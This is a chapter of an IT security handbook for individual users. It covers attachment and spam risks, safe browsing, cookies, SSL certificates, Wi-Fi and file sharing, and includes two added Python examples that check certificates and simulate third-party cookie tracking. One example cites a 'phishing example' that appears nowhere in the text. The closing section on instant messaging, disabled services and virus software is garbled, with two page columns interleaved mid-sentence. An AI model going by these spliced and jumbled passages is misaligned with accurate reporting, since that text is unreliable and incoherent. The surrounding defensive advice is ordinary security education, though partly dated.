By up-to-date, we do not necessarily mean the latest version of the software. Most companies and developers will issue fixes for bugs (at least security-related bugs) for older versions as well. Note that for free software it is common for the developer to provide fixes only for the most recent version; this means that to stay free of known security bugs, you must regularly upgrade to the latest version of the software.

E-mail

Evolution of e-mail

If you go back into network ancient history (10-30 years ago), e-mail was used for sending text messages. Most of the systems that deployed e-mail also had some way to transfer files. Typically, though, the file transfer mechanisms were somewhat arcane and difficult to use. This did not matter much when the main users of networks were technology experts. However, as the use of e-mail spread to the greater public, the application had to become easier to understand and to use.

The problem was that traditional e-mail allowed only printable text, and most files, such as word processing files or executable programs, contain non-printable characters. The solution was to "encode" the non-printable information so that it became printable. (Encoding is described in more detail in Addendum 1.) This printable file was inserted into the e-mail message, preceded by a signal that what followed was an encoded file. When the e-mail message was received, the encoded file would be "decoded" back into its original form. Later, the concept of attachments was generalized to allow more types of file to be encoded. The new methodology was called MIME (Multipurpose Internet Mail Extensions). Once attachments became common, e-mail programs were changed to open these attachments automatically, so that the recipient could readily see what had been sent.

At about the same time, the World Wide Web was becoming popular, and it used HTML to format web pages. HTML became one of the MIME content types, allowing e-mail to be formatted (changing fonts and colors, inserting images, pointing to web pages, etc.) as needed. E-mail programs rendered HTML automatically.

Impact of enhanced e-mail

These enhancements made e-mail much more useful. Users could exchange all sorts of files easily. With skillful use of fonts, color, and images, mail could be more pleasing to the eye, and relatively simple formatting could be employed without a word processing program. However, these enhancements had some negative aspects as well. As mentioned previously, in the days before these enhancements were available, you could not get infected with a virus or worm directly through e-mail. As long as you did not run a program that you received in an attachment without verifying that it was safe, you were OK. Now, programs that you receive could execute automatically. HTML is also processed automatically, which means that it can send you to web sites that take malicious actions, including directly downloading malicious software onto your computer. In addition, specific HTML constructs could give the attacker control of your machine, due to bugs discovered in the programs that rendered that HTML.

E-mail is NOT Authenticated

In most cases, the From: address of e-mail sent over the Internet is not authenticated. This is a weakness that has been heavily exploited by spammers. When you reply to an e-mail, the reply normally goes back to whoever is listed in the From: line. Sometimes, but not always, if you look at the full headers (all of those almost incomprehensible "Received:" lines), it may be possible to roughly identify where the mail really came from. Note that a sender can forge the earlier Received: lines as easily as the From: line; only the lines added by servers you trust (your own provider's) can be relied upon.

How to protect yourself

Anyone who knows your e-mail address, or is able to guess it,29 can send you an attachment. This attachment could be relevant and useful to you, or it could be a virus, a worm, or a Trojan, any of which could do a great deal of damage. Most current e-mail programs will not open attachments without your explicit request (typically by clicking on the attachment), but if your program does open attachments automatically, turn that option off.

Rule 5: Configure your mail program not to open attachments automatically.

Rule 6: Before opening any attachment, look at the name to verify that it is not an executable program.

Virus writers are cunning. One often finds an attachment with a name like budget.xls.vbs. To the casual observer who does not know what .vbs is, this looks like a Microsoft Excel spreadsheet named "budget". In fact, it is an executable Visual Basic Script program named budget.xls.vbs; the ".xls" is just part of the name and unrelated to the Excel file type, because only the last extension determines how the system runs the file. Matters are made worse by operating systems (Windows among them) that hide known file extensions by default, so that budget.xls.vbs is displayed as budget.xls; turn that option off. The program could do anything it wished, including erasing your hard disk.

Rule 7: Never open an attachment from someone you do not know unless you are very sure that it is a type of file that cannot contain malicious code.

Remember that programs such as Microsoft Word (word processing) and Microsoft Excel (spreadsheets), and all of their equivalents, contain macro capabilities that can be used to carry a virus. Even PDF files can contain malicious programs. At the time of writing these were dangerous mainly when viewed with the full Adobe Acrobat program rather than the free Adobe Reader that most people use, but later versions of Reader also run scripts embedded in PDF files and have had exploitable bugs, so PDF attachments deserve the same caution. You should check your user manual or help screens to see what capabilities may be turned off, especially if they are rarely used.

Rule 8: Do not open an attachment from someone you do know and trust unless you are sure that they sent it deliberately.

It is possible for a colleague's machine to have a virus that causes the machine to send infected files to all of the people in his or her address book.

Rule 9: Consider configuring your e-mail program not to process "fancy" HTML and not to send it to other computers.

This means that you will miss some images and other decorative things, but it also means that you will be in better control of your e-mail activities. Note that in some e-mail programs you do not even have to open a message to execute the HTML code: having it in the preview pane is sufficient. Even though e-mail may contain HTML, many browsers and e-mail programs allow you to disable cookies, JavaScript, and plug-ins for pages that are received as part of e-mail messages.

Rule 10: Check with your ISP to see if they check e-mail for viruses and similar threats before delivering it.

Due to recent increases in virus and worm activity, more and more ISPs are doing this. Note that this does not alter any of the rules above, as you cannot presume that your ISP's filtering will be 100% effective, but your ISP's preventive actions will help in your security efforts. If your ISP is not aware of security issues, you may be able to work with them to deliver better service to you and their other customers. Feel free to share this Handbook with them!

29 In the West, there is a children's story about a magical dwarf who promises a large reward to anyone who can guess his name. The person tries many names, and eventually guesses the correct one: "Rumplestiltskin". To guess e-mail addresses, attackers repeatedly try many, many name variations in the hope that one of them will be correct. This is known as a Rumplestiltskin attack.

SPAM

Spam is the name we use for unwanted e-mail, and in particular unsolicited commercial e-mail sent out in massive numbers with no specific reason to believe that the recipient will be interested in the product. In recent years, the amount of spam has grown dramatically. In 2003, it is estimated that over 50% of all e-mail transported over the Internet is spam! Many people currently receive over ten spam e-mails for every valid one.

It would be nice if all spam contained something like "**SPAM**" in the subject line, so that we could delete it easily. In fact, laws being passed in some jurisdictions mandate that any unsolicited commercial e-mail sent from within their territory contain just such a warning. However, this type of legislation is not practical at the present time, for reasons of volume, extraterritorial spam, and enforceability. One must have a reasonable way of recognizing and eliminating spam without reading each message or notifying a potentially overburdened complaint system.

Understanding Spam

To understand the problems associated with spam, one must look at three issues: a) how do the spammers get your address, b) how should spam be defined (in detail), and c) why do the spammers send these messages at all?

a) If you engage in any of the following activities, there is a good chance that a spammer will obtain your address:

· Send mail to, or subscribe to, a semi-public mailing list
· Reply to a spam message asking to be removed from its mailing list
· Post messages to a newsgroup
· Register for something on the web, giving your e-mail address (when you are not absolutely sure it is a reputable organization)
· Use a computer that has an Ident daemon running (on many Unix systems, an Ident daemon will tell anyone who asks what your username is)
· Let your web browser know your address
· Use IRC, instant messaging, or chat
· Play games over the Internet
· Use an e-mail address that is a common given name, or an initial plus a common surname
· Put your e-mail address on a web page, or, in fact, allow your e-mail address to appear in print anywhere
· Register a domain name or be listed as the technical contact for a web site
· Use a "guessable" e-mail address
· Have your e-mail address on any system that has previously been maliciously penetrated

If any of these apply to you (and you will not necessarily have control over, or even knowledge of, previously penetrated systems), there is a good chance that your address has been harvested and sold to spammers. If you use the Internet to any extent, you are likely to be on some spammer's list of recipients.

b) Some commercial spam is obvious, and by the nature of its volume and irrelevance virtually everyone will agree that it is spam. For other mailings, the distinctions are less clear. In some cases, whether a particular e-mail is considered spam depends on the recipient rather than on the actual mailing. Several examples will help illustrate the point.

· Is an e-mail considered spam if it contains information on how to change the size of certain sexual body parts? Answer: Yes, unless you are a plastic surgeon or a urologist and the e-mail was an academic paper, not a commercial advertisement.
· A Call-for-Papers requesting people to submit papers for an academic conference on some obscure topic is sent to many mailing lists. Is this spam? Answer: Perhaps, unless by some coincidence the subject was of interest to you and you will submit a paper.
· A company that sold you a product sends you information about a follow-on product at your request, along with a million e-mails to other customers who asked to be notified. Is this spam? Answer: No, but any spam filtering programs at your ISP may have a hard time understanding this, as it looks like spam.
· An e-mail contains content that is spam by any definition. Is it spam? Answer: Yes, when it was originally sent. But if it was then forwarded to this author by a trusted colleague as an interesting example to include in this book, it is not spam and should not be filtered.

c) Why do spammers send spam? The simple answer is because it works. If you look at spam, you quickly see a pattern. Most spam is about:

· Making or saving money
· Improving your love life or sex life
· Improving your health

These topics have one very important thing in common: most of us care about these issues to some extent, and many of us are deeply concerned about them. So even though a very small percentage of recipients respond to spam messages on these topics (estimated at about 1 purchase for every 100,000 e-mails sent), spammers who send out many millions of messages per day might make a lot of money.

What can you do about spam?

There are many ways that one can attempt to control and limit spam. Some governments are enacting legislation prohibiting spam mailings from within their jurisdiction. Most ISPs say that using their facilities to send spam is a violation of their usage agreement. Rules such as these can be effective, but to date most spam-related rules have proven difficult and costly to enforce.

Some large (e.g. corporate) users of e-mail refuse to accept mail from ISPs that are known to allow spammers to operate. This can be effective, because it may force the ISP to clamp down on spamming activities. More often, however, this method simply hurts the ISP's innocent customers, who can no longer send e-mail to some locations. There are a number of programs that try to recognize spam and either delete it or warn the recipient that the mail looks like spam. These programs can be run at an ISP's site or in your own mail client. They look at the content of the e-mail and/or its point of origin. These criteria are difficult to evaluate, and such programs often generate false negatives or false positives.

False negatives: A false negative is produced when the scanning program decides that an e-mail is not spam when it really is. This means that it lets some spam through and thus is not 100% effective.

False positives: A false positive means that the scanning program decides that some innocent mail is spam. This can be very dangerous, particularly if the mail is discarded instead of being delivered. False positives may mean that good mail is lost and unrecoverable through electronic means.

The target in spam scanning programs is to minimize false negatives and to have no false positives. Unfortunately, reducing false negatives usually increases false positives. People who, for whatever reason, need to receive mail that looks like spam can be particularly hurt. A recent case involved an academic electronic newsletter that discussed spam. Since the newsletter included examples of spam, it was viewed as spam by some spam scanners and was deleted by several ISPs.

In addition to spam scanners, there are also spam-filtering techniques that involve the sender in the process. One such technique is a challenge-response process. When mail is received from an unknown sender, it is intercepted before the recipient can see it. A challenge is sent to the sender requesting confirmation that the mail was sent by an individual and not a program. The form of the confirmation is such that a human must reply; it cannot be handled automatically, at least not in a manner that is effective for the would-be spammer. If no confirmation is received after a few days, the mail is discarded. There are provisions for accepting mail from known mailing lists and other desired automatic mailings. The problem with this technique is that it requires manual intervention by the sender. If you send mail and are then unable to respond quickly to the confirmation request, your mail will not be delivered. If two people both use this type of service, it is possible that they would never get any mail from each other, because the first receiver will not see the mail unless it is confirmed, and the request for confirmation will not be passed on because its sender is also unknown. Some spam filters put suspected spam into a low-priority folder rather than deleting the messages. You can then periodically review the spam folder to make sure that it does not contain any false positives.

A promising new anti-spam technique is Bayesian filtering. In this method, the filter's rules improve by learning what you consider spam, and these rules can be adjusted by each recipient. The rules tend to learn who your trusted colleagues are and, at your request, will allow content that would normally be classed as spam but is of interest to you for some reason. Bayesian filters also employ linguistic techniques to allow mail containing certain words that rarely appear in spam but do appear in your real e-mail, based on prior experience with your e-mail habits. Bayesian filters are being made available for many e-mail programs.

If spam is a problem for you, you should see if your ISP offers any spam identification or filtering capabilities. You should also look into software programs that can filter out spam as it arrives at your computer.30

30 See Annexes 2-4 for web sites and other resources on anti-spam software and techniques to avoid spam.

Using the World Wide Web

As this is written in 2003, the web has been available in varying degrees for about ten years. For those who use it regularly for work, school, and recreation, it has become indispensable. Since the web has become such a common and useful tool, there is a tendency to forget that it can also be a hostile place.

Safe Browsing

In general, the web is relatively safe, but there are potential dangers. Web sites usually house content, including static text and images, but they can also house dynamic programs that are intended to run on your computer.

Rule 11: Do not allow web sites to download and execute potentially malicious programs on your computer unless you know that the site is trustworthy.

Dynamically downloading programs can be very useful. This capability allows you to use online services, including those needed to check your computer for viruses and security problems. It also enables software to be installed and updated easily, without requiring the user to select technically appropriate modules or perform complicated multi-step procedures.

Unfortunately, dynamically downloaded programs can also be malicious. All browsers allow you to control whether you can download and run JavaScript, Java, ActiveX, and other programming tools on your machine. If you want to be completely safe, you will not allow these tools to run. Of course, by disabling these features you will find that many web sites cannot function.

Instead of blocking your access to so many sites, you may wish to follow a reasonable intermediate path:

· Enable the relatively safe and very commonly used capabilities such as JavaScript. This will allow the vast majority of web sites to function properly. (JavaScript is "relatively safe" because it runs inside the browser's own sandbox; bugs in that sandbox are themselves a target, which is one more reason to keep the browser patched.)
· Either disable the less common and much less safe capabilities such as Java and ActiveX, or set the browser to ask your permission before using them. Disabling these capabilities means that the functions will not work; some sites may warn you about this, others will simply not work properly or will hang. If you choose prompting, however, the browser should detect the requirements of the site and ask for your permission to download and run a program needed to view that site's content.

Rule 12: Display the web site address you are visiting and the address you are linking to, and pay attention to them while visiting an unfamiliar web site, especially if you are allowing the site to execute programs on your computer.

Web browsers can be configured to show what web site is being visited (often called the Navigation or Address Toolbar). When your cursor is pointing to a link, they will also display where that link will take you (in the Status Bar). Watching these will tell you when you are being transferred to another site, perhaps one you do not want to visit, or perhaps one that is not trustworthy. Note that in older browsers a page's own scripts could overwrite the Status Bar text, so the Address Bar after the click is the more reliable of the two. On a practical level, you are probably not going to look at the Navigation Bar and the Status Bar every time you click, but when you are at an unfamiliar site, particularly if you have enabled Java or ActiveX, you can use these tools so that you know when you are being redirected to a new site without your permission.

Cookies

A cookie is information written to your hard disk by your browser at the request of a remote web site. When you visit the site later, the cookies owned by that site are sent back. Cookies are typically sent back only to the originating web site, although there have been browser bugs that allowed other sites to see them as well. A cookie reminds the web site who you are, what your preferences are, and what you have done before on the site. For instance, when you log on to a site with your username and password, the site can store this information in a cookie on your computer. When you return a week later, it can automatically log you on based on the information in the cookie. Cookies may also allow a web site to track what you are doing in a single session.

Although a cookie can normally be retrieved only by the originating web site, it is important to understand that the web site you are visiting may contain images and other objects from a second web site (called a foreign or third-party site). That foreign web site can also store and retrieve cookies. Since images can be transparent, you may not even know that this is happening. Such invisible images may be used for advertising purposes,31 tracking which web sites you visit.

31 Consider what happens if web sites A, B, C and D all include an invisible image from web site Z. When the invisible image from Z is displayed, Z is told which site pointed to it (A, B, C or D), and Z retrieves and re-stores a cookie remembering which web sites you have been to. Z now has a good idea of what types of things interest you, and can arrange for targeted advertising to be sent to you.

All web browsers give you a certain degree of control over whether cookies are allowed or not. In some cases, the browser may differentiate between cookies that stay on your computer, cookies that disappear when you close your browser, and those stored by the web site you are visiting versus those stored by foreign web sites. Typically, you can allow all cookies, disallow them, or have the browser ask for your permission before storing a cookie. You are never informed when a cookie is sent back to a web site.

Cookies can be viewed, since they are in text format, but typically the information has been encoded or encrypted by the web site so that it is not intelligible. Some browsers allow you to display and delete cookies, and there are third-party programs that allow you to manage cookies.

If you wish to control what web sites know about you, you should control how and when cookies are stored on your computer. Note that some sites require that cookies be stored in order to function at all. Generally these sites will tell you if they find cookies disabled.

If you use web browsers in public locations (Internet cafés, libraries, schools), note that cookies containing information about you are still being stored on that computer. In many cases, the computer owner may not allow you to control, view, or erase these cookies. So information about you may be left on these computers and used when someone else visits the same site. If you logged on to a site and your authentication information is remembered in a cookie, another user going to that site may automatically be logged on as you! That web site may then give that user stored information about you (such as your name, address, credit card information, etc.). Even with a private computer used by several people, this can be an issue. In these cases, cookies are not only a privacy issue but also a security issue.

Rule 13: Consider controlling under what circumstances you allow cookies to be stored on your computer. If you cannot control them (such as when using a computer in a public location), consider not entering private information.

Web Browser Caches

When a browser retrieves a page or an image from a web site, the browser displays it and usually stores a copy on your hard disk. This set of stored pages and images is called a cache. If you visit that site later and the page has not changed, the browser may not download the full page from scratch but will instead use the one in the cache. In some cases, web pages that are in a cache can also be viewed offline, when you are no longer connected to the Internet. This means that anything you display with a browser may be stored on the computer's hard disk as well. So if you use the web for financial transactions, information about your purchases, credit cards, and bank accounts may be stored on that computer in fully readable text. Depending on how much browsing is done on the machine and the size of the cache that is configured, these pages and images can stay on the computer for a very long time.

The name of the web's encryption capability is SSL, for Secure Sockets Layer (its successor is called TLS, Transport Layer Security; see Addendum 1 for details). You can tell if SSL is being used for messages sent to you because there is (in most browsers) a picture of a small padlock on the screen that is open for normal transmissions and closed (locked) for SSL transmissions. Also, the URL will start with "https" instead of "http". You should always use the strongest encryption possible: 128-bit is best if it is available in your country.
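The padlock in the preceding paragraph appears only after the browser has checked the server's certificate, which the rest of this section describes. The following is an added example, not code from the Handbook: it writes out two of those checks (does a name in the certificate match the site address, and does today fall inside its validity period) for certificates in the form Python's ssl.getpeercert() returns. The certificates, dates and host names are constructed for the example, and the signature and issuer-chain checks are not shown.

```python
"""Added example (not from the Handbook): two of the checks a browser makes
on a server certificate before showing the padlock, for certificates in
the dict form that Python's ssl.getpeercert() returns.  All certificates,
names and dates below are constructed for the example."""
import ssl
import time

# Constructed stand-ins for ssl.getpeercert() output (assumption: the real
# call returns dicts shaped like these).  Dates use OpenSSL's text format.
GOOD_CERT = {
    "subject": ((("commonName", "www.example.com"),),),
    "subjectAltName": (("DNS", "www.example.com"), ("DNS", "example.com")),
    "notBefore": "Jan  1 00:00:00 2003 GMT",
    "notAfter": "Dec 31 23:59:59 2004 GMT",
}
# "Someone else's certificate": valid, but issued for a different name.
RENAMED_CERT = dict(GOOD_CERT, subjectAltName=(("DNS", "old-name.example.net"),))
# "Expired": the name matches but the validity period has passed.
EXPIRED_CERT = dict(GOOD_CERT, notAfter="Jun 30 23:59:59 2003 GMT")

# The moment at which the checks are run, inside GOOD_CERT's validity window
# (an assumption for the demonstration).
WHEN = ssl.cert_time_to_seconds("Sep 15 12:00:00 2003 GMT")


def cert_names(cert):
    """Names the certificate was issued for: every DNS subjectAltName entry,
    falling back to the subject commonName for certificates that lack one."""
    names = [v.lower() for k, v in cert.get("subjectAltName", ()) if k == "DNS"]
    if not names:
        for rdn in cert.get("subject", ()):
            for key, value in rdn:
                if key == "commonName":
                    names.append(value.lower())
    return names


def name_matches(pattern, hostname):
    """Match one certificate name against the host the user asked for.

    Exact match, or a single '*' as the leftmost label that stands for
    exactly one label: *.example.com matches www.example.com but neither
    example.com nor a.b.example.com.
    """
    pattern, hostname = pattern.lower(), hostname.lower()
    if not pattern.startswith("*."):
        return pattern == hostname
    suffix = pattern[1:]                      # ".example.com"
    if not hostname.endswith(suffix):
        return False
    leftmost = hostname[:-len(suffix)]
    return bool(leftmost) and "." not in leftmost


def check_certificate(cert, hostname, now=None):
    """Return the list of problems a browser would warn about; an empty list
    means the name and dates are fine (signature checks are out of scope)."""
    now = time.time() if now is None else now
    problems = []
    names = cert_names(cert)
    if not any(name_matches(n, hostname) for n in names):
        problems.append("name mismatch: certificate is for " + ", ".join(names))
    if now < ssl.cert_time_to_seconds(cert["notBefore"]):
        problems.append("not yet valid until " + cert["notBefore"])
    if now > ssl.cert_time_to_seconds(cert["notAfter"]):
        problems.append("expired on " + cert["notAfter"])
    return problems


if __name__ == "__main__":
    for label, cert, host in [("good", GOOD_CERT, "www.example.com"),
                              ("renamed", RENAMED_CERT, "www.example.com"),
                              ("expired", EXPIRED_CERT, "www.example.com"),
                              ("impostor", GOOD_CERT, "218.5.79.162")]:
        print(label, check_certificate(cert, host, WHEN) or "ok")
```

The "impostor" case is the one to remember: a perfectly valid certificate for www.example.com presented by the host 218.5.79.162 from the phishing example fails the name check, and that is the same warning the text below describes as "someone else's certificate".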
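Returning to the third-party cookies discussed under Cookies above (footnote 31), here is an added example, not from the Handbook, that simulates the mechanism: four sites A to D each embed an invisible image from tracker Z, Z hands out an id cookie on the first image request and records the referring site on every request, and the same browser is then run with its "block foreign cookies" option on. The site names, cookie format, and the server and browser logic are all constructed for the example.

```python
"""Added example (not from the Handbook): simulation of the tracking scheme
in footnote 31 and of what blocking third-party cookies does to it.  Site
names, the cookie format and both the server and browser logic are
constructed for this example."""
import itertools

TRACKER = "z.example"   # the advertising site that serves the invisible image
SITES = ["a.example", "b.example", "c.example", "d.example"]  # all embed Z's image


class TrackerServer:
    """Web site Z: hands out an id cookie and records who referred each hit."""

    def __init__(self):
        self._ids = itertools.count(1)
        self.profiles = {}          # cookie value -> list of referring sites

    def serve_pixel(self, referer, cookie):
        """Handle one request for the invisible 1x1 image.

        Returns (Set-Cookie value or None, image bytes).  A browser that
        presents a cookie is recognised; one that does not gets a fresh id.
        """
        set_cookie = None
        if cookie is None:
            cookie = "id=%d" % next(self._ids)
            set_cookie = cookie
        self.profiles.setdefault(cookie, []).append(referer)
        return set_cookie, b"GIF89a\x01\x00\x01\x00"


class Browser:
    """A cookie jar keyed by host.  With block_third_party=True the browser
    neither stores nor sends cookies for any host other than the page's own."""

    def __init__(self, block_third_party=False):
        self.block_third_party = block_third_party
        self.jar = {}               # host -> cookie value

    def visit(self, page_host, tracker):
        # The page at page_host contains <img src="http://z.example/pixel.gif">,
        # so the browser makes a second request, to Z, carrying a Referer
        # header that names the page it came from.
        foreign = page_host != TRACKER
        blocked = self.block_third_party and foreign
        cookie = None if blocked else self.jar.get(TRACKER)
        set_cookie, _image = tracker.serve_pixel(referer=page_host, cookie=cookie)
        if set_cookie is not None and not blocked:
            self.jar[TRACKER] = set_cookie


def history_seen_by_tracker(block_third_party):
    """Visit the four sites in turn and return the profiles Z ends up with."""
    tracker = TrackerServer()
    browser = Browser(block_third_party=block_third_party)
    for site in SITES:
        browser.visit(site, tracker)
    return tracker.profiles


if __name__ == "__main__":
    print("third-party cookies allowed:", history_seen_by_tracker(False))
    print("third-party cookies blocked:", history_seen_by_tracker(True))
```

With foreign cookies allowed, Z ends up with a single profile listing all four sites in the order they were visited. With them blocked, Z sees four unrelated one-visit ids and cannot join them into a browsing history, which is the privacy gain that Rule 13 is after.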
Rule 14: If any sort of private information is displayed on a web page, clear the cache after the session is over. If you cannot clear the cache (such as when using a computer in a public location), you may decide not to use that particular computer for the task.

All browsers allow you to clear the cache (called Temporary Internet Files by Internet Explorer), but some public machines, such as those at Internet cafés, do not allow you to access the control windows that clear the cache. Although clearing the cache after entering sensitive information is very important, no browser so far has put an icon on its main toolbar to allow this to be done with one click.32

32 For Internet Explorer on Windows, select Internet Options on the Tools pull-down menu. On the General tab, under Temporary Internet Files, hit the Delete Files button. For Internet Explorer on a Macintosh, select Preferences on the Explorer or Edit menu, go to Web Browser and then Advanced, and in the box marked Cache, hit the Empty Now button. For Netscape/Mozilla, select Preferences on the Edit pull-down menu, expand the Advanced entry and select Cache, then hit Clear Disk Cache. For Safari on a Macintosh, select Empty Cache from the Safari menu, and hit Empty to confirm.

Secure Transmission

Normally when you are using the web, all the messages that you send and receive are in clear text. That is, if someone were to intercept them and print them, they would be readable and understandable. There are times when this is undesirable. Interception is of particular concern if any part of your Internet connection goes over wireless services, or if the ISP at either end of the connection is untrustworthy.

To address this, browsers and web servers support encryption. Encryption changes the messages so that they are difficult or impossible for unauthorized people to read.

Note that the padlock describes the page you received, not the message you are about to send back: a form on an encrypted page can still be set up to submit to an unencrypted address. It is normally assumed that if the page you received was encrypted, the web site will ensure that your reply is encrypted as well, and most browsers warn when a form on a secure page is about to be submitted over an insecure connection; take that warning seriously.

SSL can only work if your browser knows who it is talking to. This is accomplished by means of "security certificates" and "digital signatures". In general, if a web server wants to be trusted, its operator must obtain a security certificate from some recognized authority. If the authority is doing its job properly, it verifies that whoever is requesting the certificate really is who they say they are. The authority then signs the certificate digitally, and your browser has built-in tables to recognize these authorities. Before showing the padlock, the browser checks that signature, that the name in the certificate matches the address you asked for, and that the certificate's validity period includes today.

Occasionally, you will get a message that a web site has sent you a certificate that:

· has expired, or
· is someone else's certificate (its name does not match the site you asked for).

In the former case, the certificate has usually just recently expired and the site needs to get its paperwork in order. In the latter case, the site may have been recently renamed without the certificate being updated. However, a certificate that does not match the site's name is also exactly what you would see if someone were impersonating the site or intercepting your connection, and you have no way to tell the two situations apart. In both cases, play it safe and terminate the connection until the problem is rectified.

Is secure transmission sufficient?

The little locked padlock is designed to tell you that the web transmission is secure, and it accurately reflects that. However, transmission is not the only issue to consider. Only a very small percentage of cases of fraud or identity theft occur due to insecure transmissions. The vast majority of cases are due to:

· unscrupulous web sites,
· the web site having been compromised, or
· your computer having been compromised.

The one major exception to this is wireless transmission, which is covered next.

Privacy Policies

Many web sites publish a privacy policy. A privacy policy should describe what kind of information the site collects, what it will and will not do with that data, and how it protects the data. All web sites that collect personal or financial data should have a suitable privacy policy.

Wireless Transmission

Wireless technology of various sorts is increasingly being used in both developed and developing countries. It is often less expensive than wired technologies, easier and faster to install (particularly in less populated areas), and subject, at least at the moment, to less regulatory oversight. However, wireless technologies have two potential problems:

· It may be possible to intercept transmissions, and
· Transmission quality may vary with location, weather, time of day, nearby radio equipment, transmission speed, quality of the installation, and malicious interference.

There is little that can be done about the second group of problems. They are characteristic of wireless technology and may be seen as the price that is paid for connectivity without wires. Interception can be addressed through various levels of encryption. (See Addendum 1 for details on encryption techniques.) If the server you are communicating with supports encryption, it should be used (secure SSL web sites, for example). If you use POP e-mail, select the "APOP" option if your mail server offers it. APOP does not encrypt your password; instead, your mail program sends a one-way hash (MD5) of a timestamp supplied by the server combined with your password, so that the password itself never travels over the connection. That protects the password from a casual eavesdropper on any transmission medium, but it protects nothing else: the mail itself still travels in clear text, and anyone who records one exchange can try to guess the password offline at leisure. Where the server offers POP over SSL/TLS, use that instead, since it encrypts the whole session. If the server offers no encryption at all, you should be aware of the limitations and adjust how you use the connection, if necessary.

802.11 "Wi-Fi"

802.11 is a set of developing IEEE standards for wireless local area networks (WLAN). 802.11 (often called "Wi-Fi", a name commonly expanded as "Wireless Fidelity" although it is a trademark rather than an abbreviation) is becoming popular as an alternative to wired Ethernet for connecting computers and laptops. On the positive side, it is inexpensive and relatively fast. Unfortunately, there are several vulnerabilities in most implementations:

· Typical base stations are shipped with no security enabled.
· Unless you want to share your network connection with someone in the neighborhood, you should change the network name (SSID) from the default one and set the configuration not to broadcast it. Be aware, however, that this only keeps casual users from noticing your network: the SSID is still sent in the clear whenever a legitimate computer connects, so anyone listening with the right tools can learn it. Hiding the SSID is not a substitute for encryption.
· The encryption mechanism (WEP) is weak and can easily be broken. Nevertheless, in the absence of a better mechanism, you should enable it. Remember that it is vulnerable to attack if anyone really wants to look at your transmissions, including passwords.
· A newer encryption mechanism, WPA, resolves the problems in WEP and is available in newer equipment. It is strongly recommended for all Wi-Fi installations.

Mobile Telephones

Mobile telephones (often called cellular phones or hand-phones) are widely used for voice transmissions. At times, they are also used for data. Many mobile telephone technologies allow eavesdropping and are not secure.

Long-haul Lines

Long links, particularly to remote areas, are often built using wireless technologies. Typically the link will serve many users simultaneously. If the transmission method is highly directional (using dish or Yagi antennas), it is relatively difficult to intercept transmissions without specialized equipment. These links may be encrypted with the addition of hardware encryption devices if necessary.

Local Loop Wireless Telephones

Wireless local loops to homes and businesses are used in many countries, as they allow telephones to be installed without the cost and trouble of building wired infrastructure, and because wireless equipment is not as easy to steal and resell as copper wire. As with a wired telephone, when a modem is connected to these lines, the line becomes a data link. The wireless technology used may be interceptable. Depending on your location, your country's regulations, and local practices, you may want to check with your service provider to see whether the link is encrypted, and thus protected, at least to a certain extent.

Other Internet Issues

File Sharing

File sharing is one of the most useful networking tools if you have more than one computer. In the simplest situation, it lets you access, change, create, or delete files on one system while working on another. The two systems could be in the same room or half a world apart. Among other things, file sharing allows you to copy files to and from a laptop before traveling or while you are away on a trip. At the other extreme, a single computer acting as a file server can take the place of the hard disk for a large number of computers. In this case, most or all of your files reside on the file server and you access them over the network.

The obvious vulnerability is that if you can access your files remotely, someone else may be able to do so as well. A less obvious vulnerability is that if you share files with another user, you become exposed to security problems on their computer: if they become infected with a virus and have write access to your files, you may now be infected. If you read an infected file from their disk, you may now be infected.

Rule 15: If you are not using file sharing, disable it. If you are using it, to the extent possible, limit what can be done to those functions that you need.

Rule 16: If you use file sharing, set robust usernames and passwords and limit the access permissions to the least that will allow you to do your work.

Rule 17: If you share files with another user, make sure that they take security seriously.

Virtually all file sharing and remote file access facilities allow you to set up usernames and passwords to control access. Generally, they also allow you to control what a user can do (read only, write, create, erase). Many systems allow you to control what any user can do. For example, you could restrict the entire remote access facility so that it only allows read access; if you do not need write access, disable it if you can.

Typically, systems that support some form of file sharing also support the sharing of printers. Although giving someone remote access to your printer is typically not hazardous, it is better to restrict such services unless they are needed. It is possible that a bug will be discovered that allows malicious actions through an access path that should have been used for printing only.

Instant messaging

Instant messaging is a facility that allows a message typed on one computer to be displayed on one or more other computers virtually instantaneously. Unlike e-mail, both sender and recipient must be online at the time. Instant messaging goes under many names on various systems. Among them are: Chat, ICQ (an acronym-like homonym for "I Seek You"), IRC (Internet Relay Chat), Talk, AIM (AOL Instant Messenger), and Messenger.

it is up to the user to turn them off. Often the user is
not even aware that the services are there. For many Internet communities such as AOL, MSN, Yahoo, years, some Unix systems were designed so that every game-playing hosts, and many others all have their installed user machine could act as an unrestricted mail own Messenger and Chat variants. Some of these hub if they did not explicitly turn the capability off. interoperate with others, and some do not. This allowed spammers to use these machines to send spam, without the machine owner's knowledge. Many messaging systems allow you to select a name that will be displayed with your messages and that allows Rule 19: Disable all Internet services that are other participants to send messages to you. They often not needed and used regularly. allow your real identity to be disguised, although the system administrators can identify who you are, at least Increasingly, suppliers are becoming aware of the problem. by your IP address. So, despite their pride at developing feature-rich systems, they are shipping their programs with extraneous services Rule 18: Instant messaging can be very helpful, disabled; the user may enable them, if they are needed. but use it with care and knowledge. In either case, it is important for users to make sure that unused services are not enabled. Such services Instant messaging plays a very useful role for include file and print sharing, web servers, mail servers, several reasons: file transfer protocol (FTP) servers, Remote Procedure Call (RPC) servers, and others. · it is much faster and easier to use than mail and has almost no delay ­ this makes interactive conversations much more practical than e-mail, · messages can usually be sent and received in a small window on your screen while you are doing other work, and · you do not have to reveal your e-mail address (and identity) to other participants. For certain types of uses, messaging is far preferable to e-mail. 
In some people's minds, it is also more secure, as the messages are not copied to disk at various places, as is the case for regular e-mail. However, users are cautioned that messaging is still not particularly secure. The major problem with messaging systems is that some of them have been expanded to allow file transfer. This makes them vulnerable to the same problems as other types of file sharing, including e-mail attachments. Some messaging systems also allow remote execution of com- mands, potentially allowing attacks on your computer. Improperly Enabled Services Operating systems and applications have become very powerful and functional. In most cases, a typical user does not need or want all of the capabilities that their software offers. Services that are not needed should be turned off (disabled). Unfortunately, some software sup- pliers ship their software with all services enabled and Information Technology Security Handbook SECURITY FOR INDIVIDUALS 63 CHAPTER 7. · If a virus, worm or Trojan is detected, the program TOOLS TO ENHANCE SECURITY will either remove it (disinfect) or it will tell you that the problem cannot be fixed and will "hide" the At a Glance bad file so that it cannot cause any damage. A virus checker with up-to-date virus signatures In this chapter, software tools and techniques to (a signature is the specific characteristic of each virus enhance computer and network security are investigated. that is recognized by the checker) is an essential part These software packages include virus checkers, firewalls of any computer, whether it is Internet-connected or and remote access tools. not. Note that there are few known Unix viruses at the Virus software time this is being written but Unix worms and Trojans P certainly do exist. 
